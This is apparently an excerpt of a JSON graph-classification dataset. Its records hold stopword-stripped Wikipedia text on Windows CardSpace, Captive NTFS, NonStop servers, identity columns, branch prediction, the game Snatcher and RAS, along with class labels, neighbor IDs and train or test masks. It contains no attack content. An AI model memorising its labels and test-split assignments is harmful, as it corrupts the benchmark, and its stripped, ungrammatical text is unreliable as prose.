    "text": "Windows_CardSpace:windows cardspace windows cardspace codenamed infocard microsoft now-canceled client software identity metasystem cardspace instance class identity client software called identity selector cardspace stores references users digital identities presenting users visual information cards cardspace provides consistent ui designed help people easily securely use identities applications web sites accepted resistance phishing attacks adherence kim cameron 7 laws identity goals design information card-enabled application website wishes obtain information user application website requests particular set claims user cardspace ui appears switching display cardspace service displays user stored identities visual i-cards user selects infocard use cardspace software contacts issuer identity obtain digitally signed xml token contains requested information cardspace also allows users create personal also known self-issued information cards contain one 14 fields identity information full name address etc transactions may require managed infocard issued third party identity provider makes claims person behalf bank employer government agency windows cardspace built top web services protocol stack open set xml-based protocols including ws-security ws-trust ws-metadataexchange ws-securitypolicy means technology platform supports ws-* protocols integrate cardspace order accept information cards website developer simply needs declare html codice_1 tag specifies claims website demanding user implement code decrypt returned token extract claim values identity provider wants issue tokens must provide means user obtain managed card provide security token service sts handles ws-trust requests returns appropriate encrypted signed token identity provider wish build sts able obtain one variety vendors including pingidentity bmc sun microsystems microsoft siemens well companies organizations cardspace identity metasystem upon based token-format-agnostic cardspace compete directly internet identity architectures like openid saml ways three approaches identity seen complementary indeed information cards used today signing openid providers windows live id accounts saml identity providers kinds services ibm novell planned support higgins trust framework provide development framework includes support information cards web services protocol stack thus including cardspace within broader extensible framework also supporting identity-related technologies saml openid microsoft initially shipped windows cardspace .net framework 3.0 runs windows xp windows server 2003 windows vista installed default windows vista well windows 7 available free download xp server 2003 via windows update updated version cardspace shipped .net framework 3.5 windows 7 cardspace technology used new credential manager management storage saved user credentials february 15 2011 microsoft announced windows cardspace 2.0 would shipped microsoft currently working replacement called u-prove",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8740,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      6709,
      8246,
      10812,
      3648,
      4674,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      83,
      9813,
      10839,
      603,
      9819,
      608,
      2145,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      135,
      2183,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      10902,
      11414,
      3224,
      4248,
      5119,
      10396,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      5320,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      3303,
      1770,
      11498,
      3308,
      3821,
      10989,
      10991,
      10993,
      2804,
      3834,
      3323,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      11030,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      823,
      10039,
      315,
      6972,
      7486,
      5952,
      3394,
      1347,
      1348,
      844,
      847,
      3922,
      1366,
      4439,
      5465,
      10079,
      11616,
      2401,
      2402,
      7523,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      10624,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      7064,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      4010,
      10157,
      430,
      1966,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      9665,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      5078,
      1498,
      5594,
      478,
      479,
      8159,
      8161,
      6114,
      6115,
      4074,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      9205,
      10229,
      2047
    ],
    "mask": "None"
  },
  {
    "node_id": 8228,
    "label": 6,
    "text": "Captive_NTFS:captive ntfs captive ntfs discontinued open-source project within linux programming community started jan kratochvíl driver wrapper around original microsoft windows ntfs file system driver using parts reactos code taking approach captive ntfs aimed provide safe write support ntfs partitions release ntfs-3g free ntfs driver full write support january 26 2006 jan kratochvíl released version 1.1.7 package version restores compatibility recent linux kernels replacing obsolete lufs linux userland file system module fuse file system userspace linux 2.6.14 included official linux kernel captive ntfs requires ntfs.sys distributed legal reasons either obtained installed windows system computers ntfs partitions likely extracted certain microsoft service packs",
    "neighbors": [
      9762,
      3975,
      6797,
      1617,
      2193,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 8229,
    "label": 3,
    "text": "NonStop_(server_computers):nonstop server computers nonstop series server computers introduced market 1976 tandem computers inc. beginning nonstop product line followed hewlett-packard integrity nonstop product line extension nonstop systems based integrated hardware/software stack hp also developed nonstop os operating system nonstop systems extent self-healing circumvent single points failure equipped almost redundant components mainline component fails system automatically falls back backup systems often used banks stock exchanges telecommunication providers enterprises requiring extremely high uptime originally introduced 1976 tandem computers inc. line later owned compaq 1997 hewlett-packard since 2003 2005 current product line hp integrity nonstop tns/e servers based intel itanium microprocessors introduced 2014 first systems nonstop x tns/x running intel x86 chip introduced early nonstop applications specifically coded fault-tolerance requirement removed 1983 introduction transaction monitoring facility tmf handles various aspects fault tolerance system level nonstop os message-based operating system designed fault tolerance works process pairs ensures backup processes redundant cpus take case process cpu failure data integrity maintained takeovers transactions data lost corrupted operating system whole branded nonstop os includes guardian layer low-level component operating system so-called oss personality runs atop layer implements unix-like interface components os use operating system application designed support fault tolerant hardware operating system continually monitors status components switching control necessary maintain operations also features designed software allow programs written continuously available programs accomplished using pair processes one process performs primary processing serves hot backup receiving updates data whenever primary reaches critical point processing primary stop backup steps resume execution using current transaction systems support relational database management systems like nonstop sql hierarchical databases enscribe hp integrity nonstop computers line fault-tolerant server computers based intel itanium processor platform optimized transaction processing average availability levels 99.999 observed nonstop systems feature massively parallel processing mpp architecture provide linear scalability cpu systems expanded 4000 cpus runs copy os shared-nothing architecture — share nothing arrangement also known loosely coupled multiprocessing diminishing returns occur processors added see amdahl law due integrated hardware/software stack single system image even largest configurations system management requirements nonstop systems rather low deployments single production server complex server farm customers also backup server remote location disaster recovery standard products keep data production backup server sync hence fast takeover data loss also disaster situation production server disabled destroyed hp also developed data warehouse business intelligence server line hp neoview based nonstop line acted database server providing nonstop os nonstop sql lacked transaction processing functionality original nonstop systems line retired longer marketed january 24 2011",
    "neighbors": [
      11136,
      2179,
      5384,
      6281,
      3214,
      785,
      5523,
      8212,
      10518,
      1304,
      5658,
      5029,
      7983,
      11184,
      1722,
      2623,
      6722,
      5571,
      709,
      1606,
      9285,
      7243,
      9677,
      3281,
      1874,
      2258,
      4817,
      8282,
      11100,
      1638,
      6247,
      6252,
      6765,
      5999,
      11505,
      5756
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8230,
    "label": 1,
    "text": "Identity_column:identity column identity column column also known field database table made values generated database much like autonumber field microsoft access sequence oracle concept important database science many rdbms systems implement type generated key although terminology identity column differs primary key values managed server usually modified many cases identity column used primary key however always case common misconception identity column enforce uniqueness however case want enforce uniqueness column must include appropriate constraint microsoft sql server options seed starting value increment default seed increment 1. often useful necessary know identity value generated insert command microsoft sql server provides several functions identity provides last value generated current connection current scope ident_current tablename provides last value generated regardless connection scope created example",
    "neighbors": [
      7523,
      10628,
      2632,
      10737,
      2901,
      11030
    ],
    "mask": "Test"
  },
  {
    "node_id": 8231,
    "label": 3,
    "text": "Branch_predictor:branch predictor computer architecture branch predictor digital circuit tries guess way branch e.g if–then–else structure go known definitively purpose branch predictor improve flow instruction pipeline branch predictors play critical role achieving high effective performance many modern pipelined microprocessor architectures x86 two-way branching usually implemented conditional jump instruction conditional jump either taken continue execution first branch code follows immediately conditional jump taken jump different place program memory second branch code stored known certain whether conditional jump taken taken condition calculated conditional jump passed execution stage instruction pipeline see fig 1 without branch prediction processor would wait conditional jump instruction passed execute stage next instruction enter fetch stage pipeline branch predictor attempts avoid waste time trying guess whether conditional jump likely taken taken branch guessed likely fetched speculatively executed later detected guess wrong speculatively executed partially executed instructions discarded pipeline starts correct branch incurring delay time wasted case branch misprediction equal number stages pipeline fetch stage execute stage modern microprocessors tend quite long pipelines misprediction delay 10 20 clock cycles result making pipeline longer increases need advanced branch predictor first time conditional jump instruction encountered much information base prediction branch predictor keeps records whether branches taken taken encounters conditional jump seen several times base prediction history branch predictor may example recognize conditional jump taken often taken every second time branch prediction branch target prediction branch prediction attempts guess whether conditional jump taken branch target prediction attempts guess target taken conditional unconditional jump computed decoding executing instruction branch prediction branch target prediction often combined circuitry static prediction simplest branch prediction technique rely information dynamic history code executing instead predicts outcome branch based solely branch instruction early implementations sparc mips two first commercial risc architectures used single-direction static branch prediction always predict conditional jump taken always fetch next sequential instruction branch jump evaluated found taken instruction pointer get set non-sequential address cpus evaluate branches decode stage single cycle instruction fetch result branch target recurrence two cycles long machine always fetches instruction immediately taken branch architectures define branch delay slots order utilize fetched instructions advanced form static prediction presumes backward branches taken forward branches backward branch one target address lower address technique help prediction accuracy loops usually backward-pointing branches taken often taken processors allow branch prediction hints inserted code tell whether static prediction taken taken intel pentium 4 accepts branch prediction hints feature abandoned later intel processors static prediction used fall-back technique processors dynamic branch prediction dynamic predictors sufficient information use motorola mpc7450 g4e intel pentium 4 use technique fall-back static prediction decisions made compile time execution program dynamic branch prediction uses information taken taken branches gathered run-time predict outcome branch using random pseudorandom bit pure guess would guarantee every branch 50 correct prediction rate improved worsened reordering instructions simplest static prediction assume take compilers reorder instructions get better 50 correct prediction also would make timing much nondeterministic superscalar processors mips r8000 alpha 21264 alpha 21464 ev8 fetch line instructions pointer next line next-line predictor handles branch target prediction well branch direction prediction next-line predictor points aligned groups 2 4 8 instructions branch target usually first instruction fetched initial instructions fetched wasted assuming simplicity uniform distribution branch targets 0.5 1.5 3.5 instructions fetched discarded respectively since branch generally last instruction aligned group instructions taken branch delay slot discarded assuming uniform distribution branch instruction placements 0.5 1.5 3.5 instructions fetched discarded discarded instructions branch destination lines add nearly complete fetch cycle even single-cycle next-line predictor 1-bit saturating counter essentially flip-flop records last outcome branch simple version dynamic branch predictor possible although accurate 2-bit saturating counter state machine four states branch evaluated corresponding state machine updated branches evaluated taken change state toward strongly taken branches evaluated taken change state toward strongly taken advantage two-bit counter scheme one-bit scheme conditional jump deviate twice done past prediction changes example loop-closing conditional jump mispredicted rather twice original non-mmx intel pentium processor uses saturating counter though imperfect implementation spec'89 benchmarks large bimodal predictors saturate 93.5 correct every branch maps unique counter predictor table indexed instruction address bits processor fetch prediction every instruction instruction decoded two-level branch predictor also referred correlation-based branch predictor uses two-dimensional table counters also called pattern history table table entries two-bit counters codice_1 statement executed three times decision made third execution might depend upon whether previous two taken scenarios two-level adaptive predictor works efficiently saturation counter conditional jumps taken every second time regularly recurring pattern predicted well saturating counter two-level adaptive predictor remembers history last n occurrences branch uses one saturating counter possible 2 history patterns method illustrated figure 3 consider example n 2 means last two occurrences branch stored two-bit shift register branch history register four different binary values 00 01 10 11 zero means taken one means taken pattern history table contains four entries per branch one 2 4 possible branch histories entry table contains two-bit saturating counter type figure 2 branch branch history register used choosing four saturating counters use history 00 first counter used history 11 last four counters used assume example conditional jump taken every third time branch sequence 001001001 ... case entry number 00 pattern history table go state strongly taken indicating two zeroes comes one entry number 01 go state strongly taken indicating 01 comes zero case entry number 10 entry number 11 never used never two consecutive ones general rule two-level adaptive predictor n-bit history predict repetitive sequence period n-bit sub-sequences different advantage two-level adaptive predictor quickly learn predict arbitrary repetitive pattern method invented t.-y yeh yale patt university michigan since initial publication 1991 method become popular variants prediction method used modern microprocessors local branch predictor separate history buffer conditional jump instruction may use two-level adaptive predictor history buffer separate conditional jump instruction pattern history table may separate well may shared conditional jumps intel pentium mmx pentium ii pentium iii local branch predictors local 4-bit history local pattern history table 16 entries conditional jump spec'89 benchmarks large local predictors saturate 97.1 correct global branch predictor keep separate history record conditional jump instead keeps shared history conditional jumps advantage shared history correlation different conditional jumps part making predictions disadvantage history diluted irrelevant information different conditional jumps uncorrelated history buffer may include bits branch many branches may use two-level adaptive predictor scheme better saturating counter scheme large table sizes rarely good local prediction history buffer must longer order make good prediction size pattern history table grows exponentially size history buffer hence big pattern history table must shared among conditional jumps two-level adaptive predictor globally shared history buffer pattern history table called gshare predictor xors global history branch pc gselect concatenates global branch prediction used amd processors intel pentium core core 2 silvermont-based atom processors alloyed branch predictor combines local global prediction principles concatenating local global branch histories possibly bits program counter well tests indicate via nano processor may using technique agree predictor two-level adaptive predictor globally shared history buffer pattern history table additional local saturating counter outputs local global predictors xored give final prediction purpose reduce contentions pattern history table two branches opposite prediction happen share entry pattern history table agree predictor used first version intel pentium 4 later abandoned hybrid predictor also called combined predictor implements one prediction mechanism final prediction based either meta-predictor remembers predictors made best predictions past majority vote function based odd number different predictors scott mcfarling proposed combined branch prediction 1993 paper spec'89 benchmarks predictor good local predictor predictors like gshare use multiple table entries track behavior particular branch multiplication entries makes much likely two branches map table entry situation called aliasing turn makes much likely prediction accuracy suffer branches multiple predictors beneficial arrange predictor different aliasing patterns likely least one predictor aliasing combined predictors different indexing functions different predictors called gskew predictors analogous skewed associative caches used data instruction caching conditional jump controls loop best predicted special loop predictor conditional jump bottom loop repeats n times taken n-1 times taken conditional jump placed top loop taken n-1 times taken conditional jump goes many times one way way detected loop behavior conditional jump predicted easily simple counter loop predictor part hybrid predictor meta-predictor detects whether conditional jump loop behavior indirect jump instruction choose among two branches processors specialized indirect branch predictors newer processors intel amd predict indirect branches using two-level adaptive predictor kind instruction contributes one bit history buffer zec12 later z/architecture processors ibm support instruction preload branch predictor entry given instruction branch target address constructed adding contents general-purpose register immediate displacement value processors without mechanism simply predict indirect jump go target last time function normally return called return instruction indirect jump reads target address call stack many microprocessors separate prediction mechanism return instructions mechanism based so-called return stack buffer local mirror call stack size return stack buffer typically 4 16 entries trade-off fast branch prediction good branch prediction sometimes dealt two branch predictors first branch predictor fast simple second branch predictor slower complicated bigger tables override possibly wrong prediction made first predictor alpha 21264 alpha ev8 microprocessors used fast single-cycle next-line predictor handle branch target recurrence provide simple fast branch prediction next-line predictor inaccurate branch resolution recurrence takes long cores two-cycle secondary branch predictors override prediction next-line predictor cost single lost fetch cycle intel core i7 two branch target buffers possibly two branch predictors machine learning branch prediction using lvq multi-layer perceptrons called neural branch prediction proposed lucian vintan lucian blaga university sibiu one year later developed perceptron branch predictor neural branch predictor research developed much daniel jimenez 2001 first perceptron predictor presented feasible implement hardware first commercial implementation perceptron branch predictor amd piledriver microarchitecture main advantage neural predictor ability exploit long histories requiring linear resource growth classical predictors require exponential resource growth jimenez reports global improvement 5.7 mcfarling-style hybrid predictor also used gshare/perceptron overriding hybrid predictors main disadvantage perceptron predictor high latency even taking advantage high-speed arithmetic tricks computation latency relatively high compared clock period many modern microarchitectures order reduce prediction latency jimenez proposed 2003 fast-path neural predictor perceptron predictor chooses weights according current branch path rather according branch pc many researchers developed concept a. seznec m. monchiero d. tarjan k. skadron v. desmet akkary et al. k. aasaraai michael black etc state-of-the-art branch predictors using perceptron predictor see intel championship branch prediction competition intel already implements idea one ia-64 simulators 2003 amd ryzen multi-core processor infinity fabric samsung exynos processor include perceptron based neural branch predictor ibm 7030 stretch designed late 1950s pre-executes unconditional branches conditional branches depended index registers conditional branches first two production models implemented predict untaken subsequent models changed implement predictions based current values indicator bits corresponding today condition codes stretch designers considered static hint bits branch instructions early project decided misprediction recovery provided lookahead unit stretch part stretch reputation less-than-stellar performance blamed time required misprediction recovery subsequent ibm large computer designs use branch prediction speculative execution ibm 3090 1985 two-bit predictors introduced tom mcwilliams curt widdoes 1977 lawrence livermore national lab s-1 supercomputer independently jim smith 1979 cdc microprogrammed processors popular 1960s 1980s beyond took multiple cycles per instruction generally require branch prediction however addition ibm 3090 several examples microprogrammed designs incorporated branch prediction burroughs b4900 microprogrammed cobol machine released around 1982 pipelined used branch prediction b4900 branch prediction history state stored back in-memory instructions program execution b4900 implements 4-state branch prediction using 4 semantically equivalent branch opcodes represent branch operator type opcode used indicated history particular branch instruction hardware determines branch prediction state particular branch needs updated rewrites opcode semantically equivalent opcode hinted proper history scheme obtains 93 hit rate others granted scheme vax 9000 announced 1989 microprogrammed pipelined performs branch prediction first commercial risc processors mips r2000 r3000 earlier sparc processors trivial not-taken branch prediction use branch delay slots fetched one instruction per cycle execute in-order performance loss later r4000 uses trivial not-taken branch prediction loses two cycles taken branch branch resolution recurrence four cycles long branch prediction became important introduction pipelined superscalar processors like intel pentium dec alpha 21064 mips r8000 ibm power series processors rely one-bit simple bimodal predictors dec alpha 21264 ev6 uses next-line predictor overridden combined local predictor global predictor combining choice made bimodal predictor amd k8 combined bimodal global predictor combining choice another bimodal predictor processor caches base choice bimodal predictor counters bits l2 cache otherwise used ecc result effectively large base choice predictor tables parity rather ecc instructions l2 cache parity design sufficient since instruction suffering parity error invalidated refetched memory alpha 21464 ev8 cancelled late design minimum branch misprediction penalty 14 cycles use complex fast next-line predictor overridden combined bimodal majority-voting predictor majority vote bimodal two gskew predictors 2018 catastrophic security vulnerability called spectre made public google project zero researchers affecting virtually modern cpus vulnerability involves extracting private data leftover data caches branch mispredictions",
    "neighbors": [
      5636,
      7173,
      9739,
      8716,
      2066,
      7699,
      2071,
      5655,
      27,
      10779,
      10781,
      31,
      6181,
      10796,
      2094,
      3630,
      4144,
      6705,
      7218,
      4664,
      5176,
      2623,
      2113,
      7234,
      3142,
      2638,
      10837,
      1122,
      3175,
      6250,
      6252,
      6253,
      8815,
      6256,
      1137,
      3185,
      5235,
      630,
      8822,
      3194,
      6268,
      3197,
      8322,
      10375,
      8842,
      7313,
      146,
      8851,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      6311,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      4286,
      2241,
      2243,
      6339,
      9932,
      5329,
      725,
      10966,
      731,
      11487,
      10469,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      6391,
      10485,
      249,
      3323,
      8700,
      2302,
      10501,
      1798,
      1801,
      6924,
      6926,
      783,
      6415,
      1298,
      11539,
      7963,
      2339,
      6950,
      1321,
      9003,
      3886,
      11059,
      309,
      8501,
      11062,
      5948,
      9020,
      4928,
      8514,
      5444,
      4423,
      6474,
      8523,
      6476,
      7505,
      8530,
      9044,
      11604,
      344,
      3421,
      8543,
      1376,
      6501,
      3431,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      392,
      398,
      3470,
      3472,
      5518,
      5523,
      1428,
      407,
      409,
      7065,
      10658,
      8102,
      9126,
      936,
      10669,
      1967,
      2480,
      5040,
      10675,
      1461,
      1463,
      7607,
      4030,
      1983,
      1985,
      453,
      3014,
      5073,
      466,
      10706,
      3540,
      10199,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7657,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8232,
    "label": 3,
    "text": "Snatcher_(video_game):snatcher video game snatcher cyberpunk graphic adventure game developed published konami written designed hideo kojima first released 1988 pc-8801 msx2 japan snatcher set future east asian metropolis humanoid robots dubbed snatchers discovered killing humans replacing society player takes role gillian seed amnesiac joins snatcher hunting agency hoping help remember past gameplay takes place primarily menu-based interface player choose examine items search rooms speak characters explore semi-open world perform actions kojima wanted snatcher cinematic feel setting story heavily influenced science fiction films especially blade runner cyberpunk works akira terminator development pc versions took twice long average game time even kojima asked trim half initial story game released positive reviews poor sales garnered cult following remade role-playing game called sd snatcher msx2 1990 followed remake original adventure game using cd-rom technology released pc engine super cd-rom² system 1992 looking provide interactive experience gamers west konami developed sega cd version snatcher specifically north america europe 1994 although released poor commercial reception sega cd version received mostly positive reviews cinematic presentation mature themes uncommon games time snatcher retrospectively acclaimed one best adventure cyberpunk games time identified foundation themes kojima explored later metal gear series game significant inspiration goichi suda worked kojima produce radio drama prequel sdatcher english version snatcher never rereleased despite desire fans snatcher graphic adventure game visual novel elements player takes role protagonist gillian seed investigates hunts snatchers dangerous humanoid robots disguised humans roaming neo kobe city game visuals static images animations display top screen point-and-click interface actions made text menu commands move look investigate game puzzles dialogue trees simple lending emphasis linear storytelling sometimes character panels shown main graphics window conversations convey facial expressions game allows exploration semi-open world handful action segments player shoots enemies dispersed across 3x3 grid sega cd version supports justifier light gun packaged lethal enforcers segments snatcher set mid-21st century fifty years biological weapon known lucifer-alpha killed much world population neo kobe city metropolis artificial island eastern asia humanoid robots dubbed snatchers recently discovered killing humans donning skin disguise replacing society neo kobe government closes city outside world establishes junker task force hunt snatchers player takes role gillian seed amnesiac remember past somehow related snatchers starts working junker hopes hunting snatchers bring past light gillian seed arrives junker headquarters introduced chief cunningham receives robot navigator named metal gear junker engineer harry benson metal gear receives distress call jean-jack gibson junker agent gillian travels metal gear find pair snatchers killed try pursue snatchers forced make quick escape factory explodes gillian begins searching identity snatchers murdered jean-jack searching house speaking informant gillian identifies pair suspects hunting snatchers nearly killed saved random hajile snatcher bounty hunter random joins gillian metal gear travel hospital jean-jack identified suspicious investigation learn abandoned several years harbors secret basement find skeletons snatcher victims among find chief cunningham meaning junker chief snatcher snatchers attack group random distracts allow gillian metal gear escape back junker headquarters gillian kills chief speaks harry briefly dies mortally wounded chief immediately gillian receives call estranged wife jamie telling held kremlin gillian metal gear travel abandoned church resembling kremlin find jamie held captive scientist named elijah modnar explains gillian past father jamie involved secret experiment taken soviet union 50 years prior cold war create snatchers designed kill replace world leaders giving soviets power gillian cia agent spying project married jamie child harry benson gillian jamie placed cryogenic sleep elijah released lucifer-alpha atmosphere pair saved army lost memories due extended period time frozen become corrupt power elijah reveals intends snatchers wipe replace humanity proof mankind follies also reveals random anti-snatcher created late father based elijah appearance memories presents deactivated body point random reactivates holds elijah bay allowing gillian jamie escape metal gear activates orbital weapon destroys snatcher base killing elijah random learned larger snatcher factory moscow gillian prepares embark mission hope finally destroying snatcher menace rekindling romance jamie snatcher created hideo kojima working konami heavily influenced blade runner 1982 works cinema wanted develop game similar style game pitched cyberpunk adventure kojima found difficult explain meaning cyberpunk konami trademark department phone game originally titled junker name sounded similar existing mahjong game title new order also considered kojima like final name previous game metal gear 1987 also named enemy game development began kojima character designer tomiharu kinoshita treated project like making film anime rather game expanded form small team konami half size needed typical famicom game allowed work closely quickly game filled science fiction culture references skirt copyright laws kojima told kinoshita make gillian similar katsuhiro otomo director science fiction film akira 1988 team never aimed game mature atmosphere naturally progressed direction addition fourth wall breaking dialogue game kojima wanted print secret message heat-activated scent floppy disks could noticed warming disk drive konami approve idea year half snatcher half completed originally kojima planned six chapters told trim two team wanted create third chapter already allowed development schedule forced end game cliffhanger development took two three times longer average game difficulties memory constraints prompted staff take break development time kojima began explore concepts later game policenauts 1994 originally snatcher going pc-8801 exclusive also developed msx2 request konami pc-8801 version supports fm stereo sounds via pc-8801 sound board ii expansion card msx2 version came special cartridge provided expanded soundscape beyond platform default capabilities extra ram featuring different music track arrangements expansion cartridge raised price msx2 version beyond pc-8801 version reverse platform typically cheaper retail game pricing quantity music sound greater games time required larger usual sound team neither platform capable accurately synthesizing speech sound effects used represent character dialogue snatcher released pc-8801 november 26 1988 msx2 december year players began asking home console version soon release game large required several floppy disks cd-rom systems considered opposed systems ran rom cartridges pc engine super cd-rom² system available chosen host snatcher console port port first time development team worked cd technology team added third act version decision criticized internally others believed game already long enough using cd technology enabled add recorded speech high quality background music artist satoshi yoshioka created graphics version kojima wanted visuals appear cinematic possible yoshioka pulled inspiration blade runner terminator 1984 alien 1979 replicate hollywood-style special effects used custom drawing application konami create character graphics including facial expressions conversations found gillian expressions difficult animate due complexities characterization trial version called pilot disk released august 7 1992 covers beginning first act also contains supplemental content character introductions preview trailer select music tracks full version released october 23 1992 reportedly sold well pc engine game releasing first game sega cd lethal enforcers 1992 konami wanted bring interactive experience system western players considered making game full motion video like night trap 1992 thought may difficult ultimately decided localize port snatcher also gave snatcher developers opportunity improve upon pc engine version still completely satisfied although sega cd could display 64 colors simultaneously compared pc engine 256 team used software techniques increase 112 modified palettes compromise several scenes censored otherwise altered sega cd release woman breasts covered 14-year-old girl shown standing naked shower obscured age changed 18 options allowed gillian engage behaviors related sexual harassment removed toned allowed sniff panties stare breasts audio robot becomes aroused watching pornographic film cut entirely violence altered except one scene partially dead dog twitching innards made completely dead twitching fearing copyright issues united states clientele bar changed kamen rider alien characters konami characters feeling third act movie-like konami added interactivity additional forks choices additionally player graded well solved mysteries dates events game also moved five years still occur near future compensate late release game translated scott hards supervision jeremy blaustein konami japan translation took two three months seven voice actors recorded two half hours dialogue 26 different characters large amount text included game translation expensive konami felt difficult part porting process according blaustein kojima involved sega cd port likely working policenauts time snatcher released december 1994 europe january 1995 north america according blaustein sold couple thousand copies united states ultimately commercial failure poor sales attributed late release sega cd lifespan snatcher released japan 1996 time 32-bit game consoles playstation version released january 26 followed sega saturn version march 29 pc-8801 msx2 versions received positive reviews japan attained cult following commercially successful pc engine version also attained following japan part gore famicom tsushin gave 33 40 commending cinematic quality game still listed reader best 20 list two years release sega saturn magazine found sega saturn version faithful port pc engine version snatcher arrived west sega cd received praise story cinematic presentation mature themes cinematic told mature story gamers familiar time mean machines sega felt snatcher substantial adventure games calling one involved storyboards backgrounds video game game writing generally lauded videogames game players felt juvenile humor sometimes conflicted otherwise serious tone reviewer gamefan called one longest involving games played long time wrote never played – nay experienced – game moving dramatic gore-riddled ma-17 adult magazine praised konami retaining mature content mean machines sega believed snatcher presentation heightened use cd-rom technology supported digitized voices high quality graphics critics praised english voice acting writing though next generation thought konami could contracted better actors graphics criticized computer video games dated videogames generic magazines discussed graphics positive light gamepro liked japanese anime style graphics felt combined writing drew players story however reviewer criticized music calling old-fashioned cyberpunk adventure mean machines sega compared positively john carpenter-style incidental themes critics felt game slow moving times rewarded patient players gamepro wrote rewards patience persistence plodding ultimate future games felt game linear leaned heavily illusion choice story could advanced completing tasks certain order mean machines sega felt puzzles challenging game considerably longer substantial rise dragon 1990 another cyberpunk adventure game computer video games felt gun shooting sections weak disappointing snatcher called one best adventure games best cyberpunk games time continued receive praise story presentation waypoint wrote narrative visuals hold contrast sega cd cyberpunk adventure games kotaku called science fiction cornucopia liked game explored topics human existence fear machines replacing humans felt game heavily influenced science fiction films including blade runner terminator akira invasion body snatchers 1956 publications also picked inspirations especially blade runner retro gamer felt ironic game cinematic games using full motion video destructoid enjoyed plot complained interface allgame wrote text-based menu driven games like snatcher become tedious felt storyline graphics made snatcher worth time critics discussed snatcher setting stage kojima later works 1up.com felt game demonstrated love film cerebral affair efforts ingenuity attention detail helped make game especially noteworthy game informer wrote snatcher foreshadowed kojima use science fiction explore philosophy sex human condition metal gear solid snatcher remains one kojima renowned games often overshadowed metal gear solid series snatcher obtained cult following influence science fiction works including project itoh novel genocidal organ 2015 adventure game kojima expressed interest reviving snatcher capacity explained time work project would welcome another director lead according project never feasible business perspective 2011 said sequel would need sell half million copies make sense financially kojima left konami 2015 game remains property company expressed interest reviving either rerelease sequel game lack availability modern platforms surprised critics believed would play well nintendo ds 3ds following footsteps successful graphic adventures platforms like sega cd version remains sole release western territories demand driven prices copies secondary market making emulation reasonable option players japanese copies far cheaper game text-based nature makes difficult non-japanese readers japanese pc engine version included turbografx-16 mini fans experimented porting game systems demo early part game made virtual boy 2015 complete stereoscopic 3d effects pcm music another fan experimented porting dreamcast remixed soundtrack retouched visuals snatcher first translation project jeremy blaustein went translate kojima metal gear solid 1998 blaustein launched crowdfunding campaign kickstarter steampunk adventure game titled blackmore 2014 game directed blaustein former snatcher staff making parts team meet funding goal snatcher remade role-playing game called sd snatcher msx2 released 1990 sd stands super deformed japanese media another way reference chibi character designs game plays top-down perspective player controls gillian ventures environment player encounters enemy field game shifts first-person battle mode player must shoot enemies using one many different guns different parts enemy targeted different weapons varying abilities ranges outside key plot points game significantly changes locations explored events transpired original game also concludes story similar manner cd-rom versions like msx2 version snatcher sd snatcher shipped expanded sound cartridge translated dutch-based group oasis 1993 making one earliest documented fan translations episodic radio drama prequel sdatcher released 2011 collaboration kojima game designer goichi suda suda credited snatcher along works yu suzuki igniting interest video games asked kojima wanted make new game together project lead radio drama announced 2007 script written suda music composed akira yamaoka worked suda grasshopper manufacture studio worked silent hill series original snatcher artist satoshi yoshioka promotional illustrations first act released september new acts released every week november year distributed free later sold cds later translated fans",
    "neighbors": [
      7108,
      2469,
      9957,
      9006,
      2383,
      2096,
      10931,
      4317
    ],
    "mask": "None"
  },
  {
    "node_id": 8233,
    "label": 3,
    "text": "Reliability,_availability_and_serviceability:reliability availability serviceability reliability availability serviceability ras computer hardware engineering term involving reliability engineering high availability serviceability design phrase originally used international business machines ibm term describe robustness mainframe computers computers designed higher levels ras many features protect data integrity help stay available long periods time without failure data integrity uptime particular selling point mainframes fault-tolerant systems ras originated hardware-oriented term systems thinking extended concept reliability-availability-serviceability systems general including software note distinction reliability availability reliability measures ability system function correctly including avoiding data corruption whereas availability measures often system available use even though may functioning correctly example server may run forever ideal availability may unreliable frequent data corruption physical faults temporary permanent transient intermittent faults typically handled detection correction e.g. ecc codes instruction replay see permanent faults lead uncorrectable errors handled replacement duplicate hardware e.g. processor sparing passing uncorrectable error high level recovery mechanisms successfully corrected intermittent fault also reported operating system os provide information predictive failure analysis example hardware features improving ras include following listed subsystem fault-tolerant designs extended idea making ras defining feature computers applications like stock market exchanges air traffic control system crashes would catastrophic fault-tolerant computers e.g. see tandem computers stratus technologies tend duplicate components running lock-step reliability become less popular due high cost high availability systems using distributed computing techniques like computer clusters often used cheaper alternatives",
    "neighbors": [
      7939,
      1801,
      6281,
      11533,
      5523,
      1309,
      2847,
      4521,
      7983,
      5941,
      1722,
      9285,
      1606,
      3153,
      3927,
      9964,
      3181,
